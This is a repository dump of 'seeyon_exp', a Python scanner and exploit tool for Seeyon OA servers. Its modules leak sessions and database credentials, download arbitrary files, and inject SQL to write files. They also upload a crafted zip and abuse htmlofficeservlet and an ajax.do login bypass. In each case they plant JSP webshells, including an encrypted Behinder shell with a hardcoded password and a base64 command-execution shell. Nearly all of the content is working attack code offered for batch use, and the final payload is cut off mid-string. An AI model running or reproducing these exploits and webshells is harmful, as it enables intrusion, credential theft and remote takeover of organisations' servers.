├── poc ├── TEST233.zip ├── __pycache__ │ ├── sql.cpython-39.pyc │ ├── ajax.cpython-39.pyc │ ├── core.cpython-39.pyc │ ├── webmail.cpython-39.pyc │ ├── information.cpython-39.pyc │ ├── getSessionList.cpython-39.pyc │ ├── session_upload.cpython-39.pyc │ └── htmlofficeservlet.cpython-39.pyc ├── webmail.py ├── getSessionList.py ├── shell.py ├── core.py ├── information.py ├── session_upload.py ├── htmlofficeservlet.py ├── sql.py └── ajax.py ├── seeyon_exp.py └── README.md /poc/TEST233.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/TEST233.zip -------------------------------------------------------------------------------- /poc/__pycache__/sql.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/sql.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/ajax.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/ajax.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/core.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/core.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/webmail.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/webmail.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/information.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/information.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/getSessionList.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/getSessionList.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/session_upload.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/session_upload.cpython-39.pyc -------------------------------------------------------------------------------- /poc/__pycache__/htmlofficeservlet.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safe6Sec/seeyon_exp/main/poc/__pycache__/htmlofficeservlet.cpython-39.pyc -------------------------------------------------------------------------------- /poc/webmail.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | def check(url): 5 | name='webmail.do任意文件下载' 6 | core.start_echo(name) 7 | path='/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=../conf/datasourceCtp.properties' 8 | r=core.get(url,path) 9 | if r: 10 | if 'workflow' in r.text and r.status_code==200: 11 | core.end_echo(name,'Payload:'+url+path) 12 | core.result(name,url+path) 13 | else: 14 | core.end_echo(name) 15 | else: 16 | core.end_echo(name) 17 | -------------------------------------------------------------------------------- /poc/getSessionList.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | import requests 5 | from bs4 import BeautifulSoup 6 | def get_sessionlist(url): 7 | name='getSessionList.jsp session 泄露' 8 | core.start_echo(name) 9 | path='/yyoa/ext/https/getSessionList.jsp?cmd=getAll' 10 | r=core.get(url,path) 11 | if r: 12 | if r.status_code==200 and "" in r.text: 13 | soup=BeautifulSoup(r.text,'lxml') 14 | sessions=soup.find_all('sessionid') 15 | print('\033[32m[#]成功获取到{}个session,第一个为:JSESSIONID={}\033[0m'.format(len(sessions)+1,sessions[0].string.strip('\n\r'))) 16 | core.end_echo(name,'Payload:'+url+path) 17 | core.result(name,url+path,'JSESSIONID='+sessions[0].string.strip('\n\r')) 18 | else: 19 | core.end_echo(name) 20 | else: 21 | core.end_echo(name) 22 | 23 | 24 | -------------------------------------------------------------------------------- /poc/shell.py: -------------------------------------------------------------------------------- 1 | 2 | import zipfile 3 | 4 | shell_name = 'test233.jsp' 5 | shell_name_zip = '../' + shell_name 6 | zip_file_name = "TEST233.zip" 7 | shell_content = r'<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 8 | 9 | def make_zip_file(): 10 | zf = zipfile.ZipFile(zip_file_name, mode='a', compression=zipfile.ZIP_DEFLATED) 11 | zf.writestr('layout.xml', "") 12 | zf.writestr(shell_name_zip, shell_content) 13 | 14 | make_zip_file() -------------------------------------------------------------------------------- /poc/core.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import requests 4 | 5 | def result(name,payload,info=None): 6 | f=open('result.txt','a') 7 | if info: 8 | f.write(name+': '+payload+' '+info+'\n') 9 | else: 10 | f.write(name+': '+payload+'\n') 11 | f.close() 12 | 13 | def start_echo(name): 14 | print('\033[34m[#]check:{}\033[0m'.format(name)) 15 | 16 | def end_echo(name,payload=None): 17 | if payload: 18 | print('\033[32m[#]存在{}\033[0m'.format(name)) 19 | print('\033[32m[#]{}\033[0m'.format(payload)) 20 | print('\033[34m----------------------------------------------------\033[0m') 21 | else: 22 | print('\033[34m[#]不存在{}\033[0m'.format(name)) 23 | print('\033[34m----------------------------------------------------\033[0m') 24 | 25 | 26 | def post(url,path,header,data,files=None): 27 | url=url+path 28 | try: 29 | if files: 30 | r=requests.post(url=url,data=data,headers=header,files=files,timeout=3,verify=False) 31 | return r 32 | else: 33 | r=requests.post(url=url,data=data,headers=header,timeout=3,verify=False) 34 | return r 35 | except Exception as e: 36 | pass 37 | 38 | def get(url,path): 39 | url=url+path 40 | try: 41 | r=requests.get(url=url,timeout=3,verify=False) 42 | return r 43 | except Exception as e: 44 | pass 45 | -------------------------------------------------------------------------------- /seeyon_exp.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import os 4 | from pyfiglet import Figlet 5 | from optparse import OptionParser 6 | from poc import webmail,session_upload,getSessionList,information,sql,htmlofficeservlet,ajax 7 | 8 | if __name__ == '__main__': 9 | # os.system('@echo off') 10 | os.system('chcp 936 >nul') 11 | f=Figlet(font='slant') 12 | print('\033[31m====================================================\033[0m') 13 | print('\033[34m{}\033[0m'.format(f.renderText('SeeyonExp'))) 14 | print(' \033[33mAuthor:Summer ver:1.0 time:2021-06-02\033[0m') 15 | print('\033[31m====================================================\033[0m'+'\n') 16 | usage="\n"+"python3 %prog -u url"+"\n"+"python3 %prog -u url --att"+"\n"+"python3 %prog -f url.txt"+"\n"+"python3 %prog -f url.txt --att" 17 | parser=OptionParser(usage=usage) 18 | parser.add_option('-u','--url',dest='url',help="target url") 19 | parser.add_option('-f','--file',dest='file',help="url file") 20 | parser.add_option('--att',dest='attack',default=False,action='store_true',help="getshell") 21 | (options,args)=parser.parse_args() 22 | if options.file: 23 | f=open(options.file,'r') 24 | urls=f.readlines() 25 | for url in urls: 26 | url=url.strip('\n') 27 | information.check(url) 28 | getSessionList.get_sessionlist(url) 29 | webmail.check(url) 30 | sql.run(url,options.attack) 31 | session_upload.get_session(url,options.attack) 32 | htmlofficeservlet.check(url,options.attack) 33 | ajax.check(url,options.attack) 34 | print('\033[34m[#]扫描已完成,结果保存至result.txt\033[0m') 35 | 36 | if options.url: 37 | information.check(options.url) 38 | getSessionList.get_sessionlist(options.url) 39 | webmail.check(options.url) 40 | sql.run(options.url,options.attack) 41 | session_upload.get_session(options.url,options.attack) 42 | htmlofficeservlet.check(options.url,options.attack) 43 | ajax.check(options.url,options.attack) 44 | print('\033[34m[#]扫描已完成,结果保存至result.txt\033[0m') 45 | -------------------------------------------------------------------------------- /poc/information.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | 5 | def cerateMysql(url): 6 | name='createMysql.jsp 数据库敏感信息泄' 7 | core.start_echo(name) 8 | path='/yyoa/createMysql.jsp' 9 | path2='/yyoa/ext/createMysql.jsp' 10 | r=core.get(url,path) 11 | if r: 12 | if r.status_code==200 and 'root' in r.text: 13 | core.end_echo(name,'Payload:'+url+path) 14 | core.result(name,url+path) 15 | return 16 | r=core.get(url,path2) 17 | if r: 18 | if r.status_code==200 and 'root' in r.text: 19 | core.end_echo(name,'Payload:'+url+path) 20 | core.result(name,url+path) 21 | else: 22 | core.end_echo(name) 23 | else: 24 | core.end_echo(name) 25 | def DownExcelBeanServlet(url): 26 | name='DownExcelBeanServlet 用户敏感信息泄露' 27 | path='/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0' 28 | core.start_echo(name) 29 | r=core.get(url,path) 30 | if r: 31 | if r.status_code==200 and 'xls' in str(r.headers).lower(): 32 | core.end_echo(name,'Payload:'+url+path) 33 | core.result(name,url+path) 34 | else: 35 | core.end_echo(name) 36 | else: 37 | core.end_echo(name) 38 | def initDataAssess(url): 39 | name='initDataAssess.jsp 用户敏感信息泄露' 40 | path='/yyoa/assess/js/initDataAssess.jsp' 41 | core.start_echo(name) 42 | r=core.get(url,path) 43 | if r: 44 | if r.status_code==200 and 'personList' in r.text: 45 | core.end_echo(name,'Payload:'+url+path) 46 | core.result(name,url+path) 47 | else: 48 | core.end_echo(name) 49 | else: 50 | core.end_echo(name) 51 | def status(url): 52 | name='A8 状态监控页面信息泄露' 53 | path='/seeyon/management/status.jsp' 54 | core.start_echo(name) 55 | r=core.get(url,path) 56 | if r: 57 | if r.status_code==200 and 'Password' in r.text: 58 | core.end_echo(name,'Payload:'+url+path) 59 | core.result(name,url+path,'默认密码:WLCCYBD@SEEYON'+' 敏感路径:/seeyon/logs/login.log /seeyon/logs/v3x.log') 60 | else: 61 | core.end_echo(name) 62 | else: 63 | core.end_echo(name) 64 | 65 | def check(url): 66 | status(url) 67 | cerateMysql(url) 68 | DownExcelBeanServlet(url) 69 | initDataAssess(url) 70 | 71 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/603531/1622620222886-f40c9762-35e8-4547-9004-ecd3d8e52294.png#align=left&display=inline&height=178&margin=%5Bobject%20Object%5D&name=image.png&originHeight=356&originWidth=907&size=18656&status=done&style=none&width=453.5) 2 | # 工具介绍 3 | **致远OA漏洞检查与利用工具,收录漏洞如下:** 4 | ``` 5 | 信息泄露: 6 | 致远OA A8 状态监控页面信息泄露 7 | 致远OA A6 initDataAssess.jsp 用户敏感信息泄露 8 | 致远OA A6 createMysql.jsp 数据库敏感信息泄露 9 | 致远OA A6 DownExcelBeanServlet 用户敏感信息泄露 10 | 致远OA getSessionList.jsp Session泄漏漏洞 11 | 12 | SQL注入: 13 | 致远OA A6 setextno.jsp SQL注入漏洞 14 | 致远OA A6 test.jsp SQL注入漏洞 15 | 16 | 文件上传: 17 | 致远OA ajax.do 登录绕过&任意文件上传 18 | 致远OA Session泄露 任意文件上传漏洞 19 | 20 | 任意文件下载: 21 | 致远OA webmail.do任意文件下载 22 | ``` 23 | **使用方法:** 24 | ``` 25 | Usage: 26 | python3 seeyon_exp.py -u url #漏洞检测 27 | python3 seeyon_exp.py -u url --att #漏洞检测+getshell 28 | python3 seeyon_exp.py -f url.txt #批量漏洞检查 29 | python3 seeyon_exp.py -f url.txt --att #批量漏洞检测+getshell 30 | 31 | Options: 32 | -h, --help show this help message and exit 33 | -u URL, --url=URL target url 34 | -f FILE, --file=FILE url file 35 | --att getshell 36 | ``` 37 | ``` 38 | python3 seeyon_exp.py -u url 39 | ``` 40 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/603531/1622621523227-5ef552da-4bf2-4a98-ba4c-0c16292dcc8d.png#align=left&display=inline&height=463&margin=%5Bobject%20Object%5D&name=image.png&originHeight=925&originWidth=1219&size=140406&status=done&style=none&width=609.5) 41 | ``` 42 | python3 seeyon_exp.py -u url  --att 43 | ``` 44 | ![image.png](https://cdn.nlark.com/yuque/0/2021/png/603531/1622625176126-20a05004-b3e4-4188-acbf-c307f661fff5.png#align=left&display=inline&height=462&margin=%5Bobject%20Object%5D&name=image.png&originHeight=924&originWidth=1218&size=138710&status=done&style=none&width=609) 45 |
46 |
47 | **默认使用冰蝎3的webshell,密码为rebeyond** 48 |
49 |
50 | **扫码结果保存为result.txt,使用批量扫描时,建议先筛选出存活url** 51 |
52 |
53 | **仅用于授权测试,违者后果自负** 54 |
55 |
56 | 参考链接: 57 | ``` 58 | https://github.com/PeiQi0/PeiQi-WIKI-POC/tree/PeiQi/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA 59 | ``` 60 | 61 | -------------------------------------------------------------------------------- /poc/session_upload.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import requests 4 | import re 5 | import time 6 | from poc import core 7 | 8 | def get_session(url,attack): 9 | name='session泄露&&文件上传getshell' 10 | core.start_echo(name) 11 | path='/seeyon/thirdpartyController.do' 12 | header = { 13 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 14 | "Content-Type": "application/x-www-form-urlencoded", 15 | } 16 | data="method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" 17 | r=core.post(url,path,header,data) 18 | if r: 19 | if r.status_code==200 and "a8genius.do" in r.text and 'set-cookie' in str(r.headers).lower(): 20 | cookies = requests.utils.dict_from_cookiejar(r.cookies) 21 | cookie = cookies['JSESSIONID'] 22 | if attack: 23 | print('\033[32m[#]成功获取到session:\033[0m'.format(cookie)) 24 | fileUpload(url,cookie,name) 25 | else: 26 | core.end_echo(name,'session:'+cookie) 27 | core.result(name,url+path,'JSESSIONID='+cookie) 28 | else: 29 | core.end_echo(name) 30 | else: 31 | core.end_echo(name) 32 | def fileUpload(url,cookie,name): 33 | path='/seeyon/fileUpload.do?method=processUpload' 34 | print('\033[32m[#]开始上传\033[0m') 35 | files = [('file1', ('test.png', open('poc/TEST233.zip', 'rb'), 'image/png'))] 36 | header={'Cookie':'JSESSIONID=%s'%cookie} 37 | data={'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0','isEncrypt': "0"} 38 | r=core.post(url,path,header,data,files) 39 | if r: 40 | firename=re.findall('fileurls=fileurls\+","\+\'(.+)\'',r.text,re.I) 41 | if len(firename)==0: 42 | print('\033[34m[#]上传失败\033[0m') 43 | print('\033[34m---------------------------------------------------\033[0m') 44 | else: 45 | print('\033[32m[#]上传成功\033[0m') 46 | unzip(header,url,firename,cookie,name) 47 | 48 | def unzip(header,url,firename,cookie,name): 49 | path='/seeyon/ajax.do' 50 | nowtime=time.strftime('%Y-%m-%d') 51 | data='method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + nowtime + '%22%2C%22' + firename[0] + '%22%5D' 52 | header['Content-Type']='application/x-www-form-urlencoded' 53 | print('\033[32m[#]开始解压\033[0m') 54 | r=core.post(url,path,header,data) 55 | if r.status_code == 500: 56 | print('\033[32m[#]解压成功\033[0m') 57 | print('\033[32m[#]webshell地址为:{}/seeyon/common/designer/pageLayout/test233.jsp\033[0m'.format(url)) 58 | print('\033[32m[#]冰蝎密码为:rebeyond\033[0m') 59 | print('\033[34m---------------------------------------------------\033[0m') 60 | core.result(name,url+'/seeyon/common/designer/pageLayout/test233.jsp','rebeyond '+'JSESSIONID=%s'%cookie) 61 | else: 62 | print('\033[34m[#]解压失败\033[0m') 63 | print('\033[34m---------------------------------------------------\033[0m') 64 | -------------------------------------------------------------------------------- /poc/htmlofficeservlet.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | import base64 5 | 6 | def check(url,attack): 7 | name='A8 htmlofficeservlet RCE漏洞' 8 | path='/seeyon/htmlofficeservlet' 9 | core.start_echo(name) 10 | r=core.get(url,path) 11 | if r: 12 | if r.status_code==200 and 'htmoffice' in r.text: 13 | if attack: 14 | get_shell(url,path,name) 15 | else: 16 | core.end_echo('可能'+name,url+path) 17 | core.result('可能存在'+name,url+path) 18 | else: 19 | core.end_echo(name) 20 | else: 21 | core.end_echo(name) 22 | 23 | def get_shell(url,path,name): 24 | print('\033[32m[#]开始写入webshell\033[0m') 25 | payload="REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U=" 26 | data = base64.b64decode(payload) 27 | header = { 28 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 29 | "Content-Type": "application/x-www-form-urlencoded" 30 | } 31 | r=core.post(url,path,header,data) 32 | if r: 33 | r=core.get(url,'/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+echo+666') 34 | if r: 35 | if '666' in r.text: 36 | print('\033[32m[#]成功写入webshell\033[0m') 37 | core.end_echo(name,'webshell地址:'+url+'/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+echo+666') 38 | core.result(name,url+'/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+echo+666') 39 | else: 40 | print('\033[32m[#]写入webshell失败\033[0m') 41 | core.end_echo(name) 42 | else: 43 | print('\033[32m[#]写入webshell失败\033[0m') 44 | core.end_echo(name) 45 | else: 46 | print('\033[32m[#]写入webshell失败\033[0m') 47 | core.end_echo(name) 48 | -------------------------------------------------------------------------------- /poc/sql.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | import re 5 | import random 6 | def test(url,name,path,attack): 7 | core.start_echo(name) 8 | r=core.get(url,path) 9 | if r: 10 | if r.status_code==200 and '@@basedir' in r.text: 11 | oa_path=re.findall(r'>(.*?)\\OA\\',r.text)[0] 12 | oa_path=oa_path+'/OA/tomcat/webapps/yyoa/' 13 | oa_path=oa_path.replace('\\','/') 14 | if attack: 15 | webshell_name="upload_text{}.jsp".format(random.randint(1,999)) 16 | print('\033[32m[#]成功获得根目录:{}\033[0m'.format(oa_path)) 17 | upload(url,oa_path,webshell_name,name) 18 | else: 19 | core.end_echo(name,'Payload:'+url+path) 20 | core.result(name,url+path) 21 | else: 22 | core.end_echo(name) 23 | else: 24 | core.end_echo(name) 25 | 26 | def upload(url,oa_path,webshell_name,name): 27 | if name=='A6 test.jsp SQL注入漏洞': 28 | path="/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27)%20%20into%20outfile%20%27{}%27".format(oa_path+webshell_name) 29 | else: 30 | path="/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(select unhex('3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E')%20%20into%20outfile%20%27{}%27),4".format(oa_path+webshell_name) 31 | print('\033[32m[#]开始上传\033[0m') 32 | r=core.get(url,path) 33 | if 'already' in r.text and r.status_code==200: 34 | print('\033[32m[#]上传失败,存在相同文件,请重试\033[0m') 35 | elif "No Data" in r.text and r.status_code==200: 36 | get_shell(url,webshell_name,name) 37 | else: 38 | print('\033[32m[#]上传失败\033[0m') 39 | core.end_echo(name) 40 | def get_shell(url,webshell_name,name): 41 | webshell="test155{}.jsp".format(random.randint(1,999)) 42 | path='/yyoa/{}?f={}'.format(webshell_name,webshell) 43 | data="t=%3C%25%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%3E%3C%25!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%3E%3C%25if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%22e45e329feb5d925b%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%3E" 44 | header={ 45 | "Content-Type": "application/x-www-form-urlencoded" 46 | } 47 | r=core.post(url,path,header,data) 48 | if r: 49 | if r.status_code==200: 50 | webshell_path=url+'/yyoa/'+webshell 51 | print('\033[32m[#]上传成功\033[0m') 52 | print('\033[32m[#]webshell路径:{}\033[0m'.format(webshell_path)) 53 | print('\033[32m[#]冰蝎密码:rebeyond\033[0m') 54 | print('\033[34m----------------------------------------------------\033[0m') 55 | core.result(name,webshell_path,'rebeyond') 56 | else: 57 | print('\033[32m[#]上传失败\033[0m') 58 | core.end_echo(name) 59 | else: 60 | print('\033[32m[#]上传失败\033[0m') 61 | core.end_echo(name) 62 | 63 | def run(url,attack): 64 | name1='A6 test.jsp SQL注入漏洞' 65 | name2='A6 setextno.jsp SQL注入漏洞' 66 | path1='/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)' 67 | path2='/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(SELECT%20@@basedir),4#' 68 | test(url,name1,path1,attack) 69 | test(url,name2,path2,attack) -------------------------------------------------------------------------------- /poc/ajax.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from poc import core 4 | 5 | def check(url,attack): 6 | name='ajax.do登录绕过&任意文件上传' 7 | path='/seeyon/thirdpartyController.do.css/..;/ajax.do' 8 | core.start_echo(name) 9 | r=core.get(url,path) 10 | if r: 11 | if 'java.lang.NullPointerException:null' in r.text: 12 | if attack: 13 | get_shell(name,url) 14 | else: 15 | core.end_echo(name,url+path) 16 | core.result('可能存在'+name,url+path) 17 | else: 18 | core.end_echo(name) 19 | else: 20 | core.end_echo(name) 21 | 22 | def get_shell(name,url): 23 | print('\033[32m[#]开始写入webshell\033[0m') 24 | path='/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip' 25 | header={ 26 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 27 | "Content-Type": "application/x-www-form-urlencoded", 28 | } 29 | data="managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%03uTY%C2%93%C2%A2H%10%7E%C3%9E%C3%BD%15%C2%84%2F%C3%9A%C3%9136%C2%82%C2%8C%C3%ADN%C3%ACC%7B%21%C2%A2%C2%A8%C2%A0%5C%1B%C3%BB%00U%C3%88a%15%C2%B0rH%C3%991%C3%BF%7D%0B%C2%B0%C2%A7%7Bb%7B%C3%AB%C2%A52%C2%B32%C2%BF%C3%8A%C3%BB%C2%AF%C3%97%C3%AE%29%C2%B9%C3%A0%029%07%C2%92z%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%B8%C2%96ts%2F%C3%8B%C2%BB%C3%AF%C3%A2y%C2%95%5E%C2%BC%2C%0B%C2%93%C2%B8%7E%C3%94%C3%B2K%18%C3%BBL%C3%AA%C3%A4%01%C3%B3%27%C3%93%C3%A9%C3%B7%C2%9F%C2%AE%C2%9E%C3%AB%C2%A4i%C3%B6%C2%94y%1EI%C3%A2%C2%A7%C3%8E%C3%B7%C3%9F%C2%99%C3%B6%C3%BC%169%C2%A5%C3%93%0F%C2%93%C3%BE%C2%8E%C2%9A%C3%A4%C3%86%25%C3%8C%C2%BD%0B%C2%93%C2%BE%C3%93%1C%05%C2%88%C2%BD%2B%C3%B3%C2%89Z%C2%AF%C3%86%7F%C3%AC%C3%94%C2%9E%0Cx%C2%BE%1Fei%C3%95y%C3%B8%09%C3%8C%C3%9C%C2%9D%C3%88%02%0F%C2%A1%C3%9A%C2%8B%C2%9D%C2%98%C3%9E%C3%80%2C%25.7f%C2%A5e%C2%90%C2%BB%C2%A2p%C3%9B%C3%A2Z%C3%86%C2%86%C3%8ERe%C3%81%2C%29%C3%97%5C%1A%40%3C%2F%00%C2%AF%17k%C2%AC%C2%94%C2%AE6%C2%96%C2%8F%C2%83%C2%97%C3%B2%28.b%5B%C2%93%7C%C2%88u%028T%C2%BA%11%1Bn%C2%B4%21%C2%91%C2%A2%C3%A1%C2%B3%13%2B%C3%97-VS%C2%80%C3%B5%08%C2%8A%C2%88%C2%B35%C3%A1j%19%10I%22%C3%8A%C2%818%26%C2%B0%C3%86%C3%87%0B%C3%8E%C3%92%C2%84%01%7D%C3%8F%C3%96a%C2%925%C2%BC%C3%A9%17%16%C2%BF%12%C3%80R-%3F%C2%95Q%5C%C3%9B%C3%98%14r%28%C2%95%C2%BB%C2%A8%C3%BA%07%C3%B0%2F%C3%9FlQ%C2%8F%5CqA%2CSM%5Dn%C3%B8%28%C2%89Jf%C2%99%C3%8AMZ%1C%7D%C3%9B%0CX%C3%9B%10%C3%8E%C2%80LfT%C3%A7%06%C3%98%C2%AA%C2%B4%0C%15%C2%818%C3%97%C3%A5y%C2%ABw%10%C3%87%01%C3%85+%C2%92%C2%B8I%3D%5E%19%00J%C3%8B%C2%94%C3%9E%C3%B2%C2%83%2B4V%C2%99cl%C3%BC%3DW%05%C2%80%C3%9F%C3%B86%09B%C3%8FT%C2%91%C2%B4%C3%88%C2%A1%15%C2%A2%11%C2%8D%C2%8F%C2%85%C3%A6%C2%AA%C2%90%C2%96%C2%AD%C3%9D%1A%C2%AB%C3%88%C3%86%C2%A8%C2%B0%C2%8F-%C2%B6%2CJ%C3%99fZ%C2%85k%5C%21%17C%C3%96%C2%99%C2%9EG%27%C2%93%7D%C2%A69%C2%AD%C3%B3%7E%C2%B6%C2%8DZo%15%C3%90%1C%C3%90%C3%BC%C3%9D%C3%